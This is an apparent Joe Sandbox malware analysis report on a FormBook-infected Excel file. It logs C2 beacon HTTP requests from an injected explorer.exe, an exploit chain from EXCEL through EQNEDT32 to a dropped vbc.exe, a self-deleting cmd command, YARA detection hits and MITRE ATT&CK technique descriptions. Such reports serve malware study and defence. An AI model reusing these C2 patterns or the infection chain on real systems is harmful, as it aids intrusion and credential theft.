Aug 3, 2021 16:52:00.747591019 CEST	1415	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 03 Aug 2021 14:52:00 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.micheldrake.com/p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX X-ac: 2.hhn _dfw Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	23.82.57.32	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:52:06.176023960 CEST	1416	OUT	GET /p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.ruhexuangou.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 16:52:06.352396011 CEST	1417	IN	HTTP/1.1 200 OK Server: Tengine Date: Tue, 03 Aug 2021 14:52:06 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 33 34 31 0d 0a 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 64 63 34 64 64 62 66 32 62 33 66 65 65 66 64 61 35 35 37 35 30 61 66 34 34 30 35 35 30 32 31 62 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 341<html><head><script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?dc4ddbf2b3feefda55750af44055021b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49172	163.44.239.73	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 16:52:11.978595972 CEST	1418	OUT	GET /p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX HTTP/1.1 Host: www.adultpeace.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 16:52:12.266453981 CEST	1419	IN	HTTP/1.1 301 Moved Permanently Connection: close Content-Type: text/html Content-Length: 706 Date: Tue, 03 Aug 2021 14:52:12 GMT Server: LiteSpeed Location: https://www.adultpeace.com/p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2768 Parent PID: 584

General

Start time:	16:49:43
Start date:	03/08/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fa90000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2444 Parent PID: 584

General

Start time:	16:50:05
Start date:	03/08/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: vbc.exe PID: 3020 Parent PID: 2444

General

Start time:	16:50:08
Start date:	03/08/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x1370000
File size:	1336832 bytes
MD5 hash:	214B1DDF045E4D6FDD73A5C8788D2ADC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: vbc.exe PID: 2224 Parent PID: 3020

General

Start time:	16:50:11
Start date:	03/08/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x1370000
File size:	1336832 bytes
MD5 hash:	214B1DDF045E4D6FDD73A5C8788D2ADC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 1388 Parent PID: 2224

General

Start time:	16:50:14
Start date:	03/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xffca0000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: netsh.exe PID: 1428 Parent PID: 1388

General

Start time:	16:50:29
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\netsh.exe
Imagebase:	0xc00000
File size:	96256 bytes
MD5 hash:	784A50A6A09C25F011C3143DDD68E729
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 1144 Parent PID: 1428

General

Start time:	16:50:33
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\Public\vbc.exe'
Imagebase:	0x4a5f0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report oustanding 03082921.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations